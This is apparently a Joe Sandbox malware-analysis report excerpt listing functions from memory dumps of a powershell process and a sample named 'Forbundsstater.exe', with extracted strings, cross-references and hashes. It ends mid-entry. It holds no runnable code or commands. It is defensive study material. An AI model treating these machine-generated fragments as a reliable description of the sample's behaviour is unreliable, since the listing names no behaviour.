Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID: 4'eq$4'eq$84ll$84ll$tPeq$tPeq
API String ID: 0-647682617
Opcode ID: 2b1450436e6a62427667393f4c3e38a1284d42da499adb13b34053cfc2373de1
Instruction ID: 4a79bfad0df665bc9848c348c1f496ef0c94ba340ddbcb14e705f4278ccb78d3
Opcode Fuzzy Hash: 2b1450436e6a62427667393f4c3e38a1284d42da499adb13b34053cfc2373de1
Instruction Fuzzy Hash: 9541CEF1B001559BCB289F598445AAAF7A2FFC5314F28C46AD5158F245DB31DC41C7A2

Function 07547AC8 Relevance: 7.6, Strings: 6, Instructions: 118COMMON

Download Yara Rule

Strings

$eq, xrefs: 07547B7F
$eq, xrefs: 07547B63
$eq, xrefs: 07547B3B
$eq, xrefs: 07547B1F
$eq, xrefs: 07547B8B
$eq, xrefs: 07547B6F

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID: $eq$$eq$$eq$$eq$$eq$$eq
API String ID: 0-220072568
Opcode ID: 828ab524c264116370533e9441fd263266357a13caf56b6037571599641cd08e
Instruction ID: b5c87a689aff00f156602a5d52e696ed19db650688963ae7fbf97ac8a62d8f93
Opcode Fuzzy Hash: 828ab524c264116370533e9441fd263266357a13caf56b6037571599641cd08e
Instruction Fuzzy Hash: FE31B5B1B0420BCFCB659F6998411ABBBA6FF99218F14887BD405C7241EB31C841CB92

Function 0754F348 Relevance: 6.5, Strings: 5, Instructions: 210COMMON

Download Yara Rule

Strings

tPeq, xrefs: 0754F456
84ll, xrefs: 0754F3F7
$eq, xrefs: 0754F3C5
84ll, xrefs: 0754F401
tPeq, xrefs: 0754F44A

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID: 84ll$84ll$tPeq$tPeq$$eq
API String ID: 0-3443641187
Opcode ID: 4b2299a34209253be30b850aa4404b02c5109364b6442225e3a230dbcda289ba
Instruction ID: e0096761932d7c07379a2a2f555539223903693b4f8aaf24edc774b28f625728
Opcode Fuzzy Hash: 4b2299a34209253be30b850aa4404b02c5109364b6442225e3a230dbcda289ba
Instruction Fuzzy Hash: 4B71C3B1B001059FDB249F6CD444AEABBE2FF89714F18C46AE4059B395CB35DD41CBA1

Function 0754B360 Relevance: 6.4, Strings: 5, Instructions: 165COMMON

Download Yara Rule

Strings

$eq, xrefs: 0754B49D
$eq, xrefs: 0754B4AD
4'eq, xrefs: 0754B4D8
$eq, xrefs: 0754B442
4'eq, xrefs: 0754B4CC

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID: 4'eq$4'eq$$eq$$eq$$eq
API String ID: 0-2942138008
Opcode ID: 1cd07b96635f3e76043570473046b04f24966ac44745c241f6d1234891517b6a
Instruction ID: 3b1f7f6d678865baa4f4c7be93358fdecd5d2a6e8a211ac34c8bbc107f5f74bf
Opcode Fuzzy Hash: 1cd07b96635f3e76043570473046b04f24966ac44745c241f6d1234891517b6a
Instruction Fuzzy Hash: BF51D0F0B1420ADFDB24DF69D4446EAB7A2BF84358F24842BD4058B291EB31D981CBA1

Function 0754DE08 Relevance: 6.4, Strings: 5, Instructions: 150COMMON

Download Yara Rule

Strings

$eq, xrefs: 0754DEF9
4'eq, xrefs: 0754DF33
4'eq, xrefs: 0754DF27
$eq, xrefs: 0754DF09
$eq, xrefs: 0754DEAE

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID: 4'eq$4'eq$$eq$$eq$$eq
API String ID: 0-2942138008
Opcode ID: 50681eaa0e67b2ba6e0445e5bb24b85cffd5da4804ea4f91d5de18c64a6510a6
Instruction ID: 30fb7226ddf5bd04aab8ac9f5ef49199a5019039b3d66abcab34ac5c6bb6c421
Opcode Fuzzy Hash: 50681eaa0e67b2ba6e0445e5bb24b85cffd5da4804ea4f91d5de18c64a6510a6
Instruction Fuzzy Hash: 3851D3B171030AEFCF298F25C4046EA77F2BF85319F14C46AE6158B245DB31D992CB95

Function 0754B738 Relevance: 6.4, Strings: 5, Instructions: 148COMMON

Download Yara Rule

Strings

$eq, xrefs: 0754B843
4'eq, xrefs: 0754B864
$eq, xrefs: 0754B7DE
4'eq, xrefs: 0754B870
$eq, xrefs: 0754B833

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID: 4'eq$4'eq$$eq$$eq$$eq
API String ID: 0-2942138008
Opcode ID: 187a25625de9ca86f73d46f4d08cd2ff66bc1668c093ad9e0f7eb34e79ac7229
Instruction ID: 3865fb7090fa40683811d3a3fa97307272167a16f39ccdbef3074754d3172a05
Opcode Fuzzy Hash: 187a25625de9ca86f73d46f4d08cd2ff66bc1668c093ad9e0f7eb34e79ac7229
Instruction Fuzzy Hash: 6951AFF5A0020ADFDF198F29C8046EA77B2FF85319F14C46EE8158B295DB31D991CB91

Function 07542128 Relevance: 6.4, Strings: 5, Instructions: 138COMMON

Download Yara Rule

Strings

$eq, xrefs: 075421E4
$eq, xrefs: 0754217F
4'eq, xrefs: 07542242
$eq, xrefs: 075421D8
4'eq, xrefs: 07542236

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID: 4'eq$4'eq$$eq$$eq$$eq
API String ID: 0-2942138008
Opcode ID: 4f06b479c66d164190c3ea3eaf7e37237e29dea9153f9db44abcc857fba3fca4
Instruction ID: dc7462bc10d390650c7e48bf57fab5b1dce56081dc2910ed91046e36ca935e23
Opcode Fuzzy Hash: 4f06b479c66d164190c3ea3eaf7e37237e29dea9153f9db44abcc857fba3fca4
Instruction Fuzzy Hash: 4541E3B570422ADBCF258F6AC8406BBB7B2FF85214F24C46BE915CB254DB32C941C7A1

Function 0754F99B Relevance: 6.4, Strings: 5, Instructions: 136COMMON

Download Yara Rule

Strings

tPeq, xrefs: 0754FABC
XRjq, xrefs: 0754FA19
$eq, xrefs: 0754FA35
84ll, xrefs: 0754FA67
XRjq, xrefs: 0754FB4D

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID: 84ll$XRjq$XRjq$tPeq$$eq
API String ID: 0-194313136
Opcode ID: 317c1f0d66060e445aa9010648f6d11453445b128bcd382fec987e67509bf7f5
Instruction ID: 9cb023a938428eccea6c81655e220babd917c36e46fdeb2f7c396e5291b9afac
Opcode Fuzzy Hash: 317c1f0d66060e445aa9010648f6d11453445b128bcd382fec987e67509bf7f5
Instruction Fuzzy Hash: 6E517DB2A04205DBCB24CF5DC454AEABBF2BF49218F2DC0AAD814AB2D5C735DD41CB61

Function 0754EA20 Relevance: 6.4, Strings: 5, Instructions: 128COMMON

Download Yara Rule

Strings

$eq, xrefs: 0754EAD9
$eq, xrefs: 0754EA93
$eq, xrefs: 0754EACD
4'eq, xrefs: 0754EB05
4'eq, xrefs: 0754EAF9

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID: 4'eq$4'eq$$eq$$eq$$eq
API String ID: 0-2942138008
Opcode ID: fc232ae262487e06a7f1acce3ce349d6a569e5e0914f53a269d0b031956c8f23
Instruction ID: f6bfe046aff68ba84222cb7507275ffef0e94bb12e1b59a9874964093998c530
Opcode Fuzzy Hash: fc232ae262487e06a7f1acce3ce349d6a569e5e0914f53a269d0b031956c8f23
Instruction Fuzzy Hash: AD41E5B2B0021ACFCB258F7A88466FBBBA6BF85218F14857BD406C7241DF31C841C762

Function 07549CA0 Relevance: 6.4, Strings: 5, Instructions: 126COMMON

Download Yara Rule

Strings

XYnl, xrefs: 07549D67
4'eq, xrefs: 07549D8D
T^k, xrefs: 07549D4D
XYnl, xrefs: 07549D5B
4'eq, xrefs: 07549D81

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID: T^k$4'eq$4'eq$XYnl$XYnl
API String ID: 0-2017060727
Opcode ID: 23d9acf572a60ab5d243d6b3402a2275050549949ab1cbb2185138a2de91b704
Instruction ID: aa81bcd8f2b9302b5ff29a1fedcdfbb4218bd2de1092706b4b7b9b1ec6b4b286
Opcode Fuzzy Hash: 23d9acf572a60ab5d243d6b3402a2275050549949ab1cbb2185138a2de91b704
Instruction Fuzzy Hash: DC41F3B1B0410A8FCF649F69D44A6EBB7E2BFC5219F24846BC506CB245DB31E841CBA1

Function 07540470 Relevance: 6.4, Strings: 5, Instructions: 124COMMON

Download Yara Rule

Strings

$eq, xrefs: 07540541
$eq, xrefs: 075404FC
4'eq, xrefs: 0754055E
$eq, xrefs: 07540535
4'eq, xrefs: 0754056A

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID: 4'eq$4'eq$$eq$$eq$$eq
API String ID: 0-2942138008
Opcode ID: b6c3e9934a3144e28efdcf22378ba9b726f8b32a84bc76bc21ca47e0347f3fe3
Instruction ID: 3d3eb2efeec725538bb7a8451ac3784cb983babd65077961c58f84001d5fe8ab
Opcode Fuzzy Hash: b6c3e9934a3144e28efdcf22378ba9b726f8b32a84bc76bc21ca47e0347f3fe3
Instruction Fuzzy Hash: 0841D2B0B05206DBCB259F7594006FB7BA2FF85214F2484ABDA0A8B280DB35C941C791

Function 075476BF Relevance: 6.4, Strings: 5, Instructions: 121COMMON

Download Yara Rule

Strings

$eq, xrefs: 07547751
$eq, xrefs: 0754784E
tPeq, xrefs: 075477D3
$eq, xrefs: 07547735
4'eq, xrefs: 07547883

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID: 4'eq$tPeq$$eq$$eq$$eq
API String ID: 0-2181669348
Opcode ID: 8a8c159fbdaa7ca2a4517046960918925bc113dc6101e88c9a76810889b399f9
Instruction ID: e49063a8a7a34978462a4306bef0397b976605529e8753d5462883f93f078a1e
Opcode Fuzzy Hash: 8a8c159fbdaa7ca2a4517046960918925bc113dc6101e88c9a76810889b399f9
Instruction Fuzzy Hash: 544127F0A04206EFEB248F55C540BE6BBA2BF8D328F58CDABD4159B291C731D940CB91

Function 07540778 Relevance: 6.3, Strings: 5, Instructions: 97COMMON

Download Yara Rule

Strings

4'eq, xrefs: 0754080C
4'eq, xrefs: 07540818
$eq, xrefs: 075407F3
$eq, xrefs: 075407CB
$eq, xrefs: 075407E7

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID: 4'eq$4'eq$$eq$$eq$$eq
API String ID: 0-2942138008
Opcode ID: b5b1db7a56283cd23b24d92e8b3b9cb79599ac04520a8bab3a59fe8a7cdc16f0
Instruction ID: fc5535a9d13f5d3418a3d2698e1ee55ad244e6bcb4215cfc071464d6d12a390e
Opcode Fuzzy Hash: b5b1db7a56283cd23b24d92e8b3b9cb79599ac04520a8bab3a59fe8a7cdc16f0
Instruction Fuzzy Hash: 823194B1B14206CFDB249F6985042BABBA2FFC5219F3484BBC649D7295DB31C8518BD2

Function 0754192F Relevance: 6.3, Strings: 5, Instructions: 79COMMON

Download Yara Rule

Strings

$eq, xrefs: 0754197A
$eq, xrefs: 07541956
$eq, xrefs: 0754196E
$eq, xrefs: 07541A36
$eq, xrefs: 07541A42

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID: $eq$$eq$$eq$$eq$$eq
API String ID: 0-3060066584
Opcode ID: 4bd51e235044499156192262fa10c2618838335863573cdac9f938f5407b129c
Instruction ID: 70d6942a60acfab7333c47a13955f54d969d4f9bdfa4c63a173dfb4b5360be41
Opcode Fuzzy Hash: 4bd51e235044499156192262fa10c2618838335863573cdac9f938f5407b129c
Instruction Fuzzy Hash: C02126F2619B4E9FC33247295C102E3BFA7BFC2124B69409BD444CB65BDA3488C0C3A2

Function 0754A808 Relevance: 6.3, Strings: 5, Instructions: 71COMMON

Download Yara Rule

Strings

dl, xrefs: 0754A893
$eq, xrefs: 0754A817
$eq, xrefs: 0754A84E
dl, xrefs: 0754A885
$eq, xrefs: 0754A842

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID: $eq$$eq$$eq$dl$dl
API String ID: 0-1317349225
Opcode ID: 091a630c885967f5ef6abf86b8c9bef191ffdb81dac2b9eab0c266f05c8f5d7b
Instruction ID: 4b5f54cd415c876c4b78208052e5c35f797202ae3fae195d06a18d8ae6084e14
Opcode Fuzzy Hash: 091a630c885967f5ef6abf86b8c9bef191ffdb81dac2b9eab0c266f05c8f5d7b
Instruction Fuzzy Hash: 2E11E9B67542069BFBA99B6AC8047A7B7A6FBC1325F24C42FE84986281DA31C442C351

Function 075437D0 Relevance: 5.2, Strings: 4, Instructions: 192COMMON

Download Yara Rule

Strings

(fnl, xrefs: 075438D1
(fnl, xrefs: 075438C7
(fnl, xrefs: 0754394F
(fnl, xrefs: 07543945

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID: (fnl$(fnl$(fnl$(fnl
API String ID: 0-373597420
Opcode ID: 25d90c4fe167932449a9ba3abb8f613e987f3e57c7d2ff0545ca22b64b495f6c
Instruction ID: c14943c77947857732ad43b7f2ce7be5b9121e4697df5652a2c95affae934d22
Opcode Fuzzy Hash: 25d90c4fe167932449a9ba3abb8f613e987f3e57c7d2ff0545ca22b64b495f6c
Instruction Fuzzy Hash: 94715FB0E11105DFDB14CF98C851AAABBB2FF89318F14816AD805AB765CB71EC81CF91

Function 07542A68 Relevance: 5.2, Strings: 4, Instructions: 182COMMON

Download Yara Rule

Strings

84ll, xrefs: 07542B4D
tPeq, xrefs: 07542BA6
84ll, xrefs: 07542B43
tPeq, xrefs: 07542B9A

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID: 84ll$84ll$tPeq$tPeq
API String ID: 0-3906689310
Opcode ID: cbe7f1241ca4b291f650303c0bda0da63d1fedb9a6af1cbe55372c79e2a43a12
Instruction ID: 871dc1964f445d92f19fd600c6339c0aca89884c699dd67c3c8201ddfa750445
Opcode Fuzzy Hash: cbe7f1241ca4b291f650303c0bda0da63d1fedb9a6af1cbe55372c79e2a43a12
Instruction Fuzzy Hash: 245108B1B002269BCB259F69C4506EBBBE2FF84314F28C46AE805DB391DE71DD41C795

Function 0754AB98 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$eq, xrefs: 0754ABC6
$eq, xrefs: 0754ABF4
$eq, xrefs: 0754AC00
$eq, xrefs: 0754ABAA

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID: $eq$$eq$$eq$$eq
API String ID: 0-812946093
Opcode ID: 6e8cea2bd50607efbbdd5ec2ef66b953f250833f99f13b5fdd28d46836c92ea9
Instruction ID: c8bd7f6f2cd584c92d46bc2b2e763e20738bfa235aa30cf22a9fa24affea2db5
Opcode Fuzzy Hash: 6e8cea2bd50607efbbdd5ec2ef66b953f250833f99f13b5fdd28d46836c92ea9
Instruction Fuzzy Hash: 132147B13542069BEBF49BBA98007A7BB97ABC0718F24C42BB505CB381DD75C8408365

Function 0754AB7B Relevance: 5.1, Strings: 4, Instructions: 83COMMON

Download Yara Rule

Strings

$eq, xrefs: 0754ABC6
$eq, xrefs: 0754ABF4
_, xrefs: 0754AB31
$eq, xrefs: 0754ABAA

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID: _$$eq$$eq$$eq
API String ID: 0-2541222072
Opcode ID: 639ba46241806cb13d8b7c07d54169dce118ef9360450ba7ba9f80c6277abcdf
Instruction ID: 545aa9c8a295c07d0d9404225748caf9d85e79454956a8003373f7601339acfb
Opcode Fuzzy Hash: 639ba46241806cb13d8b7c07d54169dce118ef9360450ba7ba9f80c6277abcdf
Instruction Fuzzy Hash: 872149B124D3825FEBB147759C107A37FA66F93214F18C49BF584DB2C3C5299844C362

Function 07547AAF Relevance: 5.1, Strings: 4, Instructions: 76COMMON

Download Yara Rule

Strings

$eq, xrefs: 07547B7F
$eq, xrefs: 07547B63
$eq, xrefs: 07547B3B
$eq, xrefs: 07547B1F

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID: $eq$$eq$$eq$$eq
API String ID: 0-812946093
Opcode ID: b835e55c76520b9f8473a7be4bb0bc927aee536891c324fbf70814442a0b7384
Instruction ID: caa69a18864268e97adc9278c5fcdfd64f0f4a46bcb92ac52926fa5b5b2f969b
Opcode Fuzzy Hash: b835e55c76520b9f8473a7be4bb0bc927aee536891c324fbf70814442a0b7384
Instruction Fuzzy Hash: E421F5B1A0534BDFCB328F5588402F7BFB5BF5A218F1448ABD8048B242E731C840CBA2

Function 0754030B Relevance: 5.0, Strings: 4, Instructions: 43COMMON

Download Yara Rule

Strings

4'eq, xrefs: 0754037F
$eq, xrefs: 07540352
$eq, xrefs: 0754035E
4'eq, xrefs: 07540373

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID: 4'eq$4'eq$$eq$$eq
API String ID: 0-3287427201
Opcode ID: 9134e87057e8b0cb57520a9b141b641b49832ebd7ecb7076c94c071ce439614e
Instruction ID: 9a1157b067b65b2a80800d1b4a939c2c4fd667bc4598f74c5948f65f4d1003c7
Opcode Fuzzy Hash: 9134e87057e8b0cb57520a9b141b641b49832ebd7ecb7076c94c071ce439614e
Instruction Fuzzy Hash: 9501D66071D6869FC72A476858216B66FF3BFC2504B2941EBC145CB2D7CA249C01879B

Analysis Process: Forbundsstater.exePID: 7032, Parent PID: 1864COMMON

Executed Functions

Function 00156730 Relevance: 6.7, Strings: 5, Instructions: 466COMMON

Download Yara Rule

Strings

(oeq, xrefs: 0015697A
,iq, xrefs: 001569F2
(oeq, xrefs: 00156CA5
,iq, xrefs: 00156A00
(oeq, xrefs: 00156988

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID: (oeq$(oeq$(oeq$,iq$,iq
API String ID: 0-1557207691
Opcode ID: dc95207fc45fb1cbbfe6863b497b9434ba26d355b17d443a22987013da6f947c
Instruction ID: a06b1dc6a7c8fe8efb495ad9e0381778e4781d9308d3990e3674a8c75e8943b2
Opcode Fuzzy Hash: dc95207fc45fb1cbbfe6863b497b9434ba26d355b17d443a22987013da6f947c
Instruction Fuzzy Hash: 41126271A00209DFCB14CF68C984AADBBF2FF88316F558069E865EB265D734DD85CB90

Function 0015B328 Relevance: 6.6, Strings: 5, Instructions: 350COMMON

Download Yara Rule

Strings

LjHp, xrefs: 0015B6CF
PHeq, xrefs: 0015B758
0oHp, xrefs: 0015B562
PHeq, xrefs: 0015B747
LjHp, xrefs: 0015B6E5

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID: 0oHp$LjHp$LjHp$PHeq$PHeq
API String ID: 0-2617784740
Opcode ID: 606f0224deebff8dd86d03658bd4867b20f5a7654e519947c903a6234b320b51
Instruction ID: 4fc36b4c864b62e445be720015a3a4ec68fa65d282a4e1cc10d64aff46d14d27
Opcode Fuzzy Hash: 606f0224deebff8dd86d03658bd4867b20f5a7654e519947c903a6234b320b51
Instruction Fuzzy Hash: 32E10A74E04618DFDB14CFA9C884A9DBBB1FF49311F158069E819AB362DB34AC45CF50

Function 0015BEB0 Relevance: 6.4, Strings: 5, Instructions: 190COMMON

Download Yara Rule

Strings

0oHp, xrefs: 0015BF22
LjHp, xrefs: 0015C0A5
PHeq, xrefs: 0015C118
LjHp, xrefs: 0015C08F
PHeq, xrefs: 0015C107

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID: 0oHp$LjHp$LjHp$PHeq$PHeq
API String ID: 0-2617784740
Opcode ID: 545ae34512821106e67047bb4d429de235fc25b245ec4e3846f56456712ae2f6
Instruction ID: adca91c972d2cdcf8bd18626d335d229b6b6cfd3da9dcb94d2407fcda09ac2d6
Opcode Fuzzy Hash: 545ae34512821106e67047bb4d429de235fc25b245ec4e3846f56456712ae2f6
Instruction Fuzzy Hash: 5F81B574E00218DFDB18DFA9D884A9DBBF2BF89301F14C069E819AB365DB749985CF50

Function 0015C470 Relevance: 6.4, Strings: 5, Instructions: 189COMMON

Download Yara Rule

Strings

0oHp, xrefs: 0015C4E2
LjHp, xrefs: 0015C64F
PHeq, xrefs: 0015C6D8
PHeq, xrefs: 0015C6C7
LjHp, xrefs: 0015C665

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID: 0oHp$LjHp$LjHp$PHeq$PHeq
API String ID: 0-2617784740
Opcode ID: 440e69e42cbffecff085377c6740622633a4fab31d7da34b4d3b5ea5766e95a0
Instruction ID: 6ddc8fa6fd546d0f35f227d9afbac7e4e8c0a44bc67984cb9b4a37d9b4b58e75
Opcode Fuzzy Hash: 440e69e42cbffecff085377c6740622633a4fab31d7da34b4d3b5ea5766e95a0
Instruction Fuzzy Hash: 9181E674E00218DFDB18DFA9C884A9DBBF2BF88301F24D069E819AB365DB745985CF50

Function 0015BBD2 Relevance: 6.4, Strings: 5, Instructions: 189COMMON

Download Yara Rule

Strings

PHeq, xrefs: 0015BE27
0oHp, xrefs: 0015BC42
PHeq, xrefs: 0015BE38
LjHp, xrefs: 0015BDC5
LjHp, xrefs: 0015BDAF

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID: 0oHp$LjHp$LjHp$PHeq$PHeq
API String ID: 0-2617784740
Opcode ID: 8e3a357f14e028b7801e937c5e975d120e4ad5c48ede00b998720cbdd862fafd
Instruction ID: 656bfac86bf3851ba2ffc86ab42eb432de044d586371ed3c427a0f09b249191e
Opcode Fuzzy Hash: 8e3a357f14e028b7801e937c5e975d120e4ad5c48ede00b998720cbdd862fafd
Instruction Fuzzy Hash: 2D81C374E04218DFDB18DFA9D884A9DBBF2BF89305F24C069E819AB365DB345985CF10

Function 0015C752 Relevance: 6.4, Strings: 5, Instructions: 188COMMON

Download Yara Rule

Strings

LjHp, xrefs: 0015C945
PHeq, xrefs: 0015C9B8
PHeq, xrefs: 0015C9A7
LjHp, xrefs: 0015C92F
0oHp, xrefs: 0015C7C2

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID: 0oHp$LjHp$LjHp$PHeq$PHeq
API String ID: 0-2617784740
Opcode ID: 7cd311182f740045cc715aa6757fbd2987f1ac4ecc69eac909c7b3469c030ba0
Instruction ID: 61bf9cc6da3c0f40882e0071a962620b3b4760f67cb670b109b580fdd28447da
Opcode Fuzzy Hash: 7cd311182f740045cc715aa6757fbd2987f1ac4ecc69eac909c7b3469c030ba0
Instruction Fuzzy Hash: 6B81D574E00218DFDB18DFAAC884A9DBBF2BF89311F14C069E819AB365DB749945CF50

Function 00154AD9 Relevance: 6.4, Strings: 5, Instructions: 188COMMON

Download Yara Rule

Strings

PHeq, xrefs: 00154D30
LjHp, xrefs: 00154CB8
PHeq, xrefs: 00154D41
LjHp, xrefs: 00154CCE
0oHp, xrefs: 00154B4A

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID: 0oHp$LjHp$LjHp$PHeq$PHeq
API String ID: 0-2617784740
Opcode ID: d66e749030b33b4c9a512518b9b5c13f62436acaa8366cfc2ea7e06e7c931128
Instruction ID: 68b93c97c34bab934108dc6d29fa076d8641879ed627da1a134d21072e5cfc41
Opcode Fuzzy Hash: d66e749030b33b4c9a512518b9b5c13f62436acaa8366cfc2ea7e06e7c931128
Instruction Fuzzy Hash: E281C574E00218DFDB18DFA9D884A9DBBF2BF89305F14C069E819AB365DB349985CF10

Function 0015C190 Relevance: 6.4, Strings: 5, Instructions: 187COMMON

Download Yara Rule

Strings

LjHp, xrefs: 0015C36F
PHeq, xrefs: 0015C3E7
PHeq, xrefs: 0015C3F8
0oHp, xrefs: 0015C202
LjHp, xrefs: 0015C385

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID: 0oHp$LjHp$LjHp$PHeq$PHeq
API String ID: 0-2617784740
Opcode ID: f94b097b77f92532d18830dcdcddef0b0664177feb53f6f21f5458039e3f09e6
Instruction ID: 9018f0b8b1e54722a0a96a745a082f0e45a858f9330d505d67262f30c7bc0746
Opcode Fuzzy Hash: f94b097b77f92532d18830dcdcddef0b0664177feb53f6f21f5458039e3f09e6
Instruction Fuzzy Hash: CE81C974E00208DFDB54DFA9D844A9DBBF2BF89301F14C069E819AB365DB745945CF50

Function 0015CA32 Relevance: 6.4, Strings: 5, Instructions: 183COMMON

Download Yara Rule

Strings

PHeq, xrefs: 0015CC87
LjHp, xrefs: 0015CC0F
LjHp, xrefs: 0015CC25
0oHp, xrefs: 0015CAA2
PHeq, xrefs: 0015CC98

Memory Dump Source

